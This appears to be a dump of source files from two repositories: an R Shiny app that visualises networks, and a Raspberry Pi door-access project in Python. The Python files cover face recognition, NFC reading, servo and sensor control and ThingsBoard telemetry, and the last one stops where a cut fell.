"text": "#\n# This is the user-interface definition of a Shiny web application. You can\n# run the application by clicking 'Run App' above.\n#\n# Find out more about building applications with Shiny here:\n#\n# http://shiny.rstudio.com/\n#\n\nlibrary(shiny)\nlibrary(plotly)\n# Define UI for application that draws a histogram\nshinyUI(fluidPage\n (mainPanel\n (tabsetPanel\n (\n # Application title\n tabPanel(\"Network Visualization\",\n \n # Sidebar with a slider input for number of bins\n sidebarLayout(\n sidebarPanel(\n selectInput(inputId = \"type\",\n label = \"Type of Graph\",\n choices = c(\"Rene Erdos\",\"P2P-Gnutella\"),\n selected = \"P2P-Gnutella\"),\n selectInput(inputId = \"traffic\",\n label = \"Type of Traffic\",\n choices = c(\"Pareto\",\"Uniform\"),\n selected = \"Uniform\"),\n selectInput(inputId = \"prior\",\n label = \"Type of Prior\",\n choices = c(\"Gravity\",\"Perturbed\"),\n selected = \"Gravity\"),\n numericInput(inputId = \"node\",\n label = \"Number of Nodes\",\n min = 1,\n max = 10000,\n value = 2),\n selectInput(inputId = \"color\",\n label = \"Type of Color\",\n choices = c(\"Red\",\"Green\"),\n selected = \"Red\"),\n submitButton(text = \"Apply Changes\", icon = NULL, width = NULL)\n ),\n \n \n # Show a plot of the generated distribution\n plotlyOutput(\"distPlot\")\n )\n ),\n tabPanel(\"Traffic\",\n dataTableOutput(\"test\")\n ),\n tabPanel(\"Interactive\",\n plotOutput(\"plot2\", click = \"plot_click\"),\n verbatimTextOutput(\"test\")\n \n )\n))))\n"
},
{
"alpha_fraction": 0.44165104627609253,
"alphanum_fraction": 0.45891180634498596,
"avg_line_length": 38.76865768432617,
"blob_id": "26d39ba9c93fa24bfcc713ca69457584ae9570a9",
"content_id": "cb8288cec92962eb14a4af88cf5fe1e5b3d30b5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 5330,
"license_type": "no_license",
"max_line_length": 239,
"num_lines": 134,
"path": "/app/rstudio-export/server.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "#\n# This is the server logic of a Shiny web application. You can run the\n# application by clicking 'Run App' above.\n#\n# Find out more about building applications with Shiny here:\n#\n# http://shiny.rstudio.com/\n#\n\nlibrary(shiny)\n\n# Define server logic required to draw a histogram\nshinyServer(function(input, output) {\n library(reshape2)\n library(plotly)\n library(igraph)\n\n # This command below gives you the topology and the perturbed prior \n # TODO: add other priors (uniform, gravity)\n system(\"python3 network_generator.py\")\n system(\"tr '\\n' , < ./data/b.csv > ./data/b.txt\")\n system(\"awk '{print $2}' ./data/g.csv > ./data/_xp.txt\")\n system(\"cut -c-8 ./data/_xp.txt > ./data/__xp.myytxt\")\n system(\"tr '\\n' , < ./data/__xp.txt > ./data/xp.txt\")\n system(\"cp ./data/a.csv ./data/a.txt\")\n \n # Actual Code to our algorithm main\n # Complile the codes \n system(\"g++ -o direct ./SR/main.cpp\")\n system(\"g++ -o Ddirect ./SR/main_dynamic.cpp\")\n \n # Execution Commands \n system(\"./direct -f ./data/ -o output.txt\")\n system(\"./Ddirect -f ./data/ -o output.txt\")\n \n # f <- read.csv(file = \"edges_with_index_1.csv\", header = FALSE)\n f <- read.csv(file = \"edges.txt\", header = FALSE)\n edges <- c()\n print(dim(f)[1])\n for (e in 1:dim(f)[1]){\n edges <- append(edges, c(f[e, 1], f[e, 2]))\n }\n length(edges)\n # G <- make_graph(edges)\n # G <- graph_from_edgelist(as.matrix(f), directed = TRUE)\n G = graph.data.frame(f, directed=TRUE, vertices=NULL)\n print(length(E(G)))\n print(length(V(G)))\n print(length(E(G)))\n net = G\n lines_df_x <- c()\n lines_df_y <- c()\n lines_df_z <- c()\n l = layout_on_sphere(net)\n list_data <- list(c(V(G)$name))\n for (i in 1:(length(f$V1))){\n p1 <- (f[i, 1])\n p2 <- (f[i, 2])\n p1 <- match(p1, list_data[[1]])\n p2 <- match(p2, list_data[[1]])\n x1 <- (l[p1,1])\n y1 <- (l[p1,2])\n z1 <- (l[p1,3])\n x2 <- (l[p2,1])\n y2 <- (l[p2,2])\n z2 <- (l[p2,3])\n \n lines_df_x <- c(lines_df_x, x1, x2, NA)\n lines_df_y <- c(lines_df_y,y1, y2, NA)\n lines_df_z <- c(lines_df_z,z1, z2, NA)\n \n }\n \n output$distPlot <- renderPlotly(plot_ly(as.data.frame(l), x=l[,1], y = l[,2], z = l[,3], type = 'scatter3d' ) %>% \n add_paths(x=lines_df_x,y=lines_df_y,z=lines_df_z))\n \n##################################################################################################################################################################### \n\n ##### Tab 3 ###### \n \n##################################################################################################################################################################### \n library(Cairo)\n library(ggplot2)\n mtcars2 <- mtcars[, c(\"mpg\", \"cyl\", \"disp\", \"hp\", \"wt\", \"am\", \"gear\")]\n output$plot2 <- renderPlot({\n ggplot(mtcars2, aes(wt, mpg)) + geom_point()\n })\n # output$click_info <- renderPrint({\n # # Because it's a ggplot2, we don't need to supply xvar or yvar; if this\n # # were a base graphics plot, we'd need those.\n # nearPoints(mtcars2, input$plot_click, addDist = TRUE)\n # brushedPoints(mtcars2, input$plot1_brush)\n # })\n output$brush_info <- renderPrint({\n #print('Hi')\n print(input$plot_dblclick)\n #print(input$plot1_click)\n #brushedPoints(mtcars2, input$plot1_brush)\n # brushedPoints(mtcars2)\n })\n\n \n\n##################################################################################################################################################################### \n \n##### Tab 2 ###### \n \n##################################################################################################################################################################### \n \n output$test <- renderDataTable({\n library(kableExtra)\n library(DT)\n library(Cairo)\n \n file_reader <- read.csv(file = \"./data/output.txt\", header = FALSE)\n transpose_step1 <- melt(file_reader)\n transpose_table <- as.data.frame(transpose_step1$value)\n colnames(transpose_table) <- c(\"Traffic\")\n transpose_table$sd_id<- cbind(c(1:length(transpose_table$Traffic)))\n datatable(transpose_table, filter = 'top', options = list(pageLength = 5))\n })\n\n #####################################################################################################################################################################\n\n ##### Tab 4 ######\n\n #####################################################################################################################################################################\n\n mat <- read.csv(\"aatThreshCompliment.csv\", header = FALSE)\n mat2 <- read.csv(\"aat.csv\", header = FALSE)\n print(mat)\n output$heatmap <- renderPlotly(heatmaply(mat2, Rowv = FALSE, Colv = FALSE, margins = c(40,40,40,40), showticklabels = FALSE,scale_fill_gradient_fun = ggplot2::scale_fill_gradient2(low = \"white\", high = \"steelblue\"),hide_colorbar=TRUE))\n output$heatmap2 <- renderPlotly(heatmaply(mat, Rowv = FALSE, Colv = FALSE, margins = c(40,40,40,40), showticklabels = FALSE,color=c(\"grey10\",\"steelblue\"),hide_colorbar=TRUE))\n})\n\n"
}
] | 16 |
XeonHis/IoTA
|
https://github.com/XeonHis/IoTA
|
f5c6729d3e3cd91bc112ef5b571a6a88d12ef470
|
d54a045fac8c06fc18b7da8b2559ef90cfa5881a
|
272f43b044f07c30061e732664f9afc4b5571cd4
|
refs/heads/main
| 2023-01-21T23:34:12.490591 | 2020-11-28T08:22:08 | 2020-11-28T08:22:08 | 306,507,712 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6561604738235474,
"alphanum_fraction": 0.6934097409248352,
"avg_line_length": 49,
"blob_id": "79d612bd96c77b0f94efeb410071f4227915a6bc",
"content_id": "0260aea0288d0f0bba0f154654c43495ee3e57bb",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 349,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 7,
"path": "/test/test_curl.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import requests\n\n# requests.get(\n# 'curl -v -X POST -d \"{\\\"card_no\\\": 25121111}\" https://demo.thingsboard.io/api/v1/iK0zWkznWEoYqBnmAtQf/telemetry '\n# '--header \"Content-Type:application/json\"')\ndata = \"{{\\\"card_no\\\": {}}}\".format('test_post2')\nrequests.post(url='https://demo.thingsboard.io/api/v1/iK0zWkznWEoYqBnmAtQf/telemetry',data=data)"
},
{
"alpha_fraction": 0.46660807728767395,
"alphanum_fraction": 0.5,
"avg_line_length": 21.760000228881836,
"blob_id": "3cb0a1563d8a3d7890e29da522dd7e088a54ba86",
"content_id": "d9b2cd9c6670ff6e3434584c60040acf961c0b26",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1138,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 50,
"path": "/hall.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import smbus\nimport time\nimport requests\nimport acceleration\nimport threading\n\n\ndef Print(value):\n if value == 0:\n print('no magnet')\n if value == 1:\n print('magnet north')\n if value == -1:\n print('magnet south')\n\n\ndef hall1():\n address = 0x48\n A0 = 0x40\n\n bus = smbus.SMBus(11)\n status = 0\n\n while True:\n bus.write_byte(address, A0)\n data = bus.read_byte(address)\n if 5 > data - 133 > -5:\n value = 0\n if data < 128:\n value = -1\n if data > 138:\n value = 1\n if value != status:\n if value != -1:\n current_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n print('door opened at ', current_time)\n time_payload = '{{\"open_time\": \"{}\"}}'.format(str(current_time))\n requests.post(url='https://demo.thingsboard.io/api/v1/rL2hzO7of5BN0jk1JMuX/telemetry',\n data=time_payload)\n # Print(value)\n status = value\n time.sleep(0.2)\n\n\ndef hall():\n pass\n\n\nif __name__ == '__main__':\n hall()\n"
},
{
"alpha_fraction": 0.61534184217453,
"alphanum_fraction": 0.6336854100227356,
"avg_line_length": 32.943397521972656,
"blob_id": "bc4a86fd535fc6215569f0e9f31354627dbd8d9d",
"content_id": "7edb9093f0029324efdb909722cf2436dc51d521",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1987,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 53,
"path": "/face_rec.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "# coding = utf-8\nimport face_recognition\nimport cv2\nimport numpy as np\nimport os, sys\nimport time\n\nos.chdir('/home/pi/ZYDEMO/iota')\n\n\n# 创建视频对象\n\n# 加载当前目录下名为'yht.jpg'的照片,照片里需要有且仅有一张脸,这张脸将作为认识的脸\n\n\ndef face_rec(video_capture, camera_get, camera_get_locations):\n # print('loading...')\n # image = face_recognition.load_image_file('yht.jpg')\n # current_location = face_recognition.face_locations(image)\n # current_encoding = face_recognition.face_encodings(image, current_location)\n # video_capture = cv2.VideoCapture('http://192.168.123.122:8080/?action=stream')\n # print(os.getcwd())\n face_list = np.load('face_encoding.npy')\n name_list = np.load('name_encoding.npy')\n\n # print('Capturing image.')\n # 读取一帧照片\n # ret, frame = video_capture.read()\n # 把照片缩小一点,能加快处理速度\n # frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n # 将cv2用的BGR颜色转换为face_recognition用的RBG颜色\n # camera_get = frame[:, :, ::-1]\n\n # 获取这一帧图片里所有人脸的位置和特征值\n # camera_get_locations = face_recognition.face_locations(camera_get)\n # print('Found {} faces in image.'.format(len(camera_get_locations)))\n camera_get_encodings = face_recognition.face_encodings(camera_get, camera_get_locations)\n\n for i in range(len(camera_get_encodings)):\n matches = face_recognition.compare_faces(face_list, camera_get_encodings[i], tolerance=0.5)\n\n if True in matches:\n first_match_index = matches.index(True)\n name = name_list[first_match_index]\n # print('I see ', name)\n # cv2.imwrite(r'/home/pi/ZYDEMO/iota/img/' + time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) + \".jpg\",\n # known)\n return [True, name]\n else:\n return [False, 'None']\n\n# if __name__ == '__main__':\n# face_rec(None)\n"
},
{
"alpha_fraction": 0.5299295783042908,
"alphanum_fraction": 0.6038732528686523,
"avg_line_length": 20.846153259277344,
"blob_id": "b56a945ad4fdaab34c0df759291b80914fc17d84",
"content_id": "59157e427fd862b4733d58e05fdbe1d51604329c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 568,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 26,
"path": "/test/gs90_DESKTOP-AJFIKR8_11月-02-073430-2020_Conflict.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import RPi.GPIO as GPIO\nimport time\nimport signal\nimport atexit\n\natexit.register(GPIO.cleanup)\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(16, GPIO.OUT, initial=False)\np = GPIO.PWM(16, 50) # 50HZ\np.start(0)\ntime.sleep(2)\n\nfor _ in range(1):\n for i in range(0, 181, 10):\n p.ChangeDutyCycle(2 + i / 18.)\n time.sleep(0.02)\n p.ChangeDutyCycle(0)\n time.sleep(0.2)\n time.sleep(1)\n print(\"wait\")\n for i in range(181, 0, -10):\n p.ChangeDutyCycle(2 + i / 18.)\n time.sleep(0.02)\n p.ChangeDutyCycle(0)\n time.sleep(0.2)\n"
},
{
"alpha_fraction": 0.6420454382896423,
"alphanum_fraction": 0.6534090638160706,
"avg_line_length": 34.20000076293945,
"blob_id": "04ca363ff9697cd83867c92e11bba10c8d630384",
"content_id": "91d9f061149afd136ee4e5376b4927d77011758b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 176,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 5,
"path": "/test/test_camera_check.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import subprocess\n\noutput = str(subprocess.Popen(['ps -a | grep mjpg'], stdout=subprocess.PIPE, shell=True).communicate()[0],\n encoding='utf8')\nprint(output == '')\n"
},
{
"alpha_fraction": 0.690095841884613,
"alphanum_fraction": 0.7444089651107788,
"avg_line_length": 17.41176414489746,
"blob_id": "cb045148886e06a685665159ba820ff8fd44b8ac",
"content_id": "d29015f727bab542ba7e758e7d33d8a8c8e110a5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 313,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 17,
"path": "/d_open.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\ntilt_pin = 27\nGPIO.setup(tilt_pin, GPIO.OUT)\ntilt = GPIO.PWM(tilt_pin, 50)\ntilt.start(0)\ntime.sleep(0.2)\ntilt.ChangeDutyCycle(12.5)\ntime.sleep(2)\ntilt.ChangeDutyCycle(2.5)\ntime.sleep(2)\ntilt.ChangeDutyCycle(0)\ntime.sleep(0.5)\ntilt.stop()\nGPIO.cleanup()\n"
},
{
"alpha_fraction": 0.6520763039588928,
"alphanum_fraction": 0.680134654045105,
"avg_line_length": 24.457143783569336,
"blob_id": "44d3df9a7c42cfd108fb1e1cd40359fec24a0704",
"content_id": "d05bab13dc4c1c84b6cdddf1f204871d2b3aeb24",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 891,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 35,
"path": "/open.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import RPi.GPIO as GPIO\nimport time\nimport requests\nimport acceleration\nimport threading\n\n\ndef open_door(current_time):\n open_thread = threading.Thread(target=open_door1(current_time))\n acc_thread = threading.Thread(target=acceleration.plt_data)\n open_thread.start()\n acc_thread.start()\n\n open_thread.join()\n acc_thread.join()\n\n\ndef open_door1(current_time):\n time_payload = '{{\"open_time\": \"{}\"}}'.format(str(current_time))\n requests.post(url='https://demo.thingsboard.io/api/v1/rL2hzO7of5BN0jk1JMuX/telemetry', data=time_payload)\n GPIO.setmode(GPIO.BCM)\n tilt_pin = 27\n GPIO.setup(tilt_pin, GPIO.OUT)\n tilt = GPIO.PWM(tilt_pin, 50)\n tilt.start(0)\n time.sleep(0.2)\n tilt.ChangeDutyCycle(12.5)\n time.sleep(2)\n tilt.ChangeDutyCycle(2.5)\n time.sleep(2)\n tilt.ChangeDutyCycle(0)\n time.sleep(0.5)\n tilt.stop()\n\n # GPIO.cleanup()\n"
},
{
"alpha_fraction": 0.6011612415313721,
"alphanum_fraction": 0.6096471548080444,
"avg_line_length": 30.985713958740234,
"blob_id": "837b3e9a08fd48f6dcd58227681634e0e826ed13",
"content_id": "1028e3354655237a446ae122359a40f93b852262",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2239,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 70,
"path": "/main.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import RPi.GPIO as GPIO\nimport time\nfrom open import open_door\n# from ultrasonic import distance\nimport camera_servo\nimport nfc\nimport threading\nimport btn\nimport subprocess\n\n\ndef check_camera():\n camera_flag = str(subprocess.Popen(['ps -a | grep mjpg'], stdout=subprocess.PIPE, shell=True).communicate()[0],\n encoding='utf8')\n if camera_flag == '':\n subprocess.Popen(['sh /home/pi/start/camera/[email protected]'], stdout=subprocess.PIPE, shell=True)\n print(\"camera is not opened, now open at \", time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n time.sleep(5)\n else:\n print(\"camera is opened\")\n\n\ndef main():\n check_camera()\n print(\"door monitor start at \", time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n nfc_thread = threading.Thread(target=nfc.nfc)\n btn_thread = threading.Thread(target=btn.btn_press)\n camera_thread = threading.Thread(target=camera_servo.start_camera)\n\n nfc_thread.start()\n btn_thread.start()\n camera_thread.start()\n\n nfc_thread.join()\n btn_thread.join()\n camera_thread.join()\n\n\n# with open('/home/pi/ZYDEMO/iota/open_detail.txt', 'a') as fp:\n# while True:\n# camera_servo.start_camera()\n# time.sleep(1)\n# btn_pin = 26\n# GPIO.setwarnings(False)\n# GPIO.setmode(GPIO.BCM)\n# GPIO.setup(btn_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n# nfcid = nfc.nfc()\n# nfc_flag = nfc.check(nfcid)\n# if nfc_flag:\n# print('nfc open at ', time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n# open_door()\n# fp.write('nfc ' + nfcid + ' open at ' + str(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())) + '\\n')\n# fp.flush()\n# time.sleep(2)\n# if GPIO.input(btn_pin) == 0:\n# print('press open at ', time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n# open_door()\n# fp.write('button open at ' + str(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())) + '\\n')\n# fp.flush()\n# time.sleep(2)\n\n# if camera_servo.start_camera():\n# print('face open at ', time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n# open_door()\n# if distance() < 20:\n# print('ultrasonic open at ', time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n# open_door()\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6800000071525574,
"alphanum_fraction": 0.7599999904632568,
"avg_line_length": 7.666666507720947,
"blob_id": "a8aff3488c4ee3fa3d4296dfad6ec4e2ac2179ed",
"content_id": "995060466b18c0c48e9a5fece63f4ed819b7a2e4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25,
"license_type": "permissive",
"max_line_length": 13,
"num_lines": 3,
"path": "/test/img.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import cv2\n\ncv2.imwrite()"
},
{
"alpha_fraction": 0.6555891036987305,
"alphanum_fraction": 0.7009063363075256,
"avg_line_length": 18.47058868408203,
"blob_id": "30e22ee07b69d55785ca4451d340b59671f800c3",
"content_id": "9262ab744b21b1c854aa85a3194f974d4041d049",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 331,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 17,
"path": "/test/test_gs90.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BCM)\ntilt_pin = 27\nGPIO.setup(tilt_pin, GPIO.OUT)\ntilt = GPIO.PWM(tilt_pin, 50)\ntilt.start(0)\ntilt.ChangeDutyCycle(2.5)\ntilt.ChangeDutyCycle(0)\n\n# while True:\n# tilt.ChangeDutyCycle(2.5)\n# tilt.ChangeDutyCycle(7.5)\n# tilt.ChangeDutyCycle(12.5)\n\n# tilt.stop()\n# GPIO.cleanup()\n"
},
{
"alpha_fraction": 0.5335720777511597,
"alphanum_fraction": 0.564010739326477,
"avg_line_length": 20.901960372924805,
"blob_id": "a85352cb4c24a9ad0b7c7f96f0a4cd405f030216",
"content_id": "d252f75d75b54245dcd029565febd5f8a056ba34",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1237,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 51,
"path": "/ultrasonic.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import RPi.GPIO as GPIO\nimport time\n\n\ndef distance():\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n trig, echo = 24, 23\n GPIO.setup(trig, GPIO.OUT)\n GPIO.setup(echo, GPIO.IN)\n # 发送高电平信号到 Trig 引脚\n GPIO.output(trig, True)\n\n # 持续 10 us\n time.sleep(0.00001)\n GPIO.output(trig, False)\n\n start_time = time.time()\n stop_time = time.time()\n\n # 记录发送超声波的时刻1\n while GPIO.input(echo) == 0:\n start_time = time.time()\n\n # 记录接收到返回超声波的时刻2\n while GPIO.input(echo) == 1:\n stop_time = time.time()\n\n # 计算超声波的往返时间 = 时刻2 - 时刻1\n time_elapsed = stop_time - start_time\n # 声波的速度为 343m/s, 转化为 34300cm/s。\n distance = (time_elapsed * 34300) / 2\n\n GPIO.cleanup()\n\n return distance\n\n# print(distance())\n#\n# if __name__ == '__main__':\n# try:\n# while True:\n# dist = distance()\n# print(dist)\n# print(\"Measured Distance = {:.2f} cm\".format(dist))\n# time.sleep(1)\n#\n# # Reset by pressing CTRL + C\n# except KeyboardInterrupt:\n# print(\"Measurement stopped by User\")\n# GPIO.cleanup()\n"
},
{
"alpha_fraction": 0.6381215453147888,
"alphanum_fraction": 0.6878452897071838,
"avg_line_length": 29.25,
"blob_id": "a5c7946e3223572c5441831408bd2a24f53d4665",
"content_id": "84053cb3d0ce6f27cfe207d869e27ebdd4479130",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 362,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 12,
"path": "/test/test1.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "from pynfc import Nfc, Desfire, Timeout, TimeoutException\n\nn = Nfc(\"pn532_uart:/dev/ttyUSB0:115200\")\n\nDESFIRE_DEFAULT_KEY = b'\\x00' * 8\nMIFARE_BLANK_TOKEN = b'\\xFF' * 1024 * 4\n\nfor target in n.poll():\n try:\n print(target.uid, target.auth(DESFIRE_DEFAULT_KEY if type(target) == Desfire else MIFARE_BLANK_TOKEN))\n except TimeoutException:\n pass"
},
{
"alpha_fraction": 0.5583398342132568,
"alphanum_fraction": 0.6209867000579834,
"avg_line_length": 28.720930099487305,
"blob_id": "4fc786a775dcd38a4bfb3c8b8614a753330f2b4b",
"content_id": "6dbed48832c52e06f3e11120aeee46cc2c77c4ee",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1725,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 43,
"path": "/test/test_hall.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import PCF\nimport time\n\n# for RPI version 1, use \"bus = smbus.SMBus(1)\"\n# 0 代表 /dev/i2c-0, 1 代表 /dev/i2c-1 ,具体看使用的树莓派那个I2C来决定\nbus = smbus.SMBus(1) #创建一个smbus实例\n\n#在树莓派上查询PCF8591的地址:“sudo i2cdetect -y 1”\ndef setup(Addr):\n global address\n address = Addr\n\ndef read(chn): #channel\n if chn == 0:\n bus.write_byte(address,0x40) #发送一个控制字节到设备\n if chn == 1:\n bus.write_byte(address,0x41)\n if chn == 2:\n bus.write_byte(address,0x42)\n if chn == 3:\n bus.write_byte(address,0x43)\n bus.read_byte(address) # 从设备读取单个字节,而不指定设备寄存器。\n return bus.read_byte(address) #返回某通道输入的模拟值A/D转换后的数字值\n\ndef write(val):\n temp = val # 将字符串值移动到temp\n temp = int(temp) # 将字符串改为整数类型\n # print temp to see on terminal else comment out\n bus.write_byte_data(address, 0x40, temp)\n #写入字节数据,将数字值转化成模拟值从AOUT输出\n\nif __name__ == \"__main__\":\n setup(0x48)\n #在树莓派终端上使用命令“sudo i2cdetect -y 1”,查询出PCF8591的地址为0x48\n while True:\n print('电位计 AIN0 = ', read(0)) # 电位计模拟信号转化的数字值\n print('光敏电阻 AIN1 = ', read(1)) # 光敏电阻模拟信号转化的数字\n print('热敏电阻 AIN2 = ', read(2)) # 热敏电阻模拟信号转化的数字值\n tmp = read(0)\n tmp = tmp*(255-125)/255+125\n# 125以下LED不会亮,所以将“0-255”转换为“125-255”,调节亮度时灯不会熄灭\n write(tmp)\n time.sleep(2)"
},
{
"alpha_fraction": 0.6258503198623657,
"alphanum_fraction": 0.6925169825553894,
"avg_line_length": 29.625,
"blob_id": "78faa4421723b774d51878bfa7a085fdb78320af",
"content_id": "516319459d1ff38c032ee9e4495ae2345f5c2dc5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 735,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 24,
"path": "/test/test.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "from adafruit_pn532.uart import PN532_UART\nimport busio\nimport serial\nimport board\nimport time\n\n# uart = busio.UART(board.TX, board.RX, baudrate=115200, timeout=100)\nuart = serial.Serial(\"/dev/ttyUSB0\",baudrate=115200)\npn532 = PN532_UART(uart, debug=False)\n\nic, ver, rev, support = pn532.firmware_version\nprint(\"Found PN532 with firmware version: {0}.{1}\".format(ver, rev))\npn532.SAM_configuration()\n\nprint(\"Waiting for RFID/NFC card...\")\nwhile True:\n # Check if a card is available to read\n uid = pn532.read_passive_target(timeout=0.5)\n print(\".\", end=\"\")\n # Try again if no card is available.\n if uid is not None:\n print(\"Found card with UID:\", [hex(i) for i in uid])\n pn532.power_down()\n time.sleep(1.0)\n"
},
{
"alpha_fraction": 0.7579618096351624,
"alphanum_fraction": 0.7595541477203369,
"avg_line_length": 40.86666488647461,
"blob_id": "727273e5eaca5e39c53a659385516d1cdbbf5f73",
"content_id": "9d72490aaaa8a74955dec827915ee5b58bc5b350",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 628,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 15,
"path": "/read_img.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import face_recognition\nimport numpy as np\n\nfacelist = list(np.load('/home/pi/ZYDEMO/iota/face_encoding.npy'))\nnamelist = list(np.load('/home/pi/ZYDEMO/iota/name_encoding.npy'))\n# namelist = []\n# facelist = []\nimage = face_recognition.load_image_file('/home/pi/ZYDEMO/iota/zcy.jpg')\nface_locations = face_recognition.face_locations(image)\nface_encodings = face_recognition.face_encodings(image, face_locations)\n# global ecodinglist, namelist\nfacelist.append(face_encodings[0])\nnamelist.append('Zhang')\nnp.save('/home/pi/ZYDEMO/iota/face_encoding.npy', face_encodings)\nnp.save('/home/pi/ZYDEMO/iota/name_encoding.npy', namelist)\n"
},
{
"alpha_fraction": 0.5700288414955139,
"alphanum_fraction": 0.6245889663696289,
"avg_line_length": 37.20769119262695,
"blob_id": "ad02c0cb9cd4f6e16a73490996f84dd8fc7109a6",
"content_id": "e310bd2fe8cfdcfabb54666ff1d5ee95fbf88cdf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14901,
"license_type": "permissive",
"max_line_length": 232,
"num_lines": 390,
"path": "/test/test_pn532.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import binascii\nimport array\nfrom functools import reduce\nimport time\nimport serial\n\nPN532_PREAMBLE = 0x00\nPN532_STARTCODE1 = 0x00\nPN532_STARTCODE2 = 0xFF\nPN532_POSTAMBLE = 0x00\n\nPN532_HOSTTOPN532 = 0xD4\nPN532_PN532TOHOST = 0xD5\n\n# PN532 Commands\nPN532_COMMAND_DIAGNOSE = 0x00\nPN532_COMMAND_GETFIRMWAREVERSION = 0x02\nPN532_COMMAND_GETGENERALSTATUS = 0x04\nPN532_COMMAND_READREGISTER = 0x06\nPN532_COMMAND_WRITEREGISTER = 0x08\nPN532_COMMAND_READGPIO = 0x0C\nPN532_COMMAND_WRITEGPIO = 0x0E\nPN532_COMMAND_SETSERIALBAUDRATE = 0x10\nPN532_COMMAND_SETPARAMETERS = 0x12\nPN532_COMMAND_SAMCONFIGURATION = 0x14\nPN532_COMMAND_POWERDOWN = 0x16\nPN532_COMMAND_RFCONFIGURATION = 0x32\nPN532_COMMAND_RFREGULATIONTEST = 0x58\nPN532_COMMAND_INJUMPFORDEP = 0x56\nPN532_COMMAND_INJUMPFORPSL = 0x46\nPN532_COMMAND_INLISTPASSIVETARGET = 0x4A\nPN532_COMMAND_INATR = 0x50\nPN532_COMMAND_INPSL = 0x4E\nPN532_COMMAND_INDATAEXCHANGE = 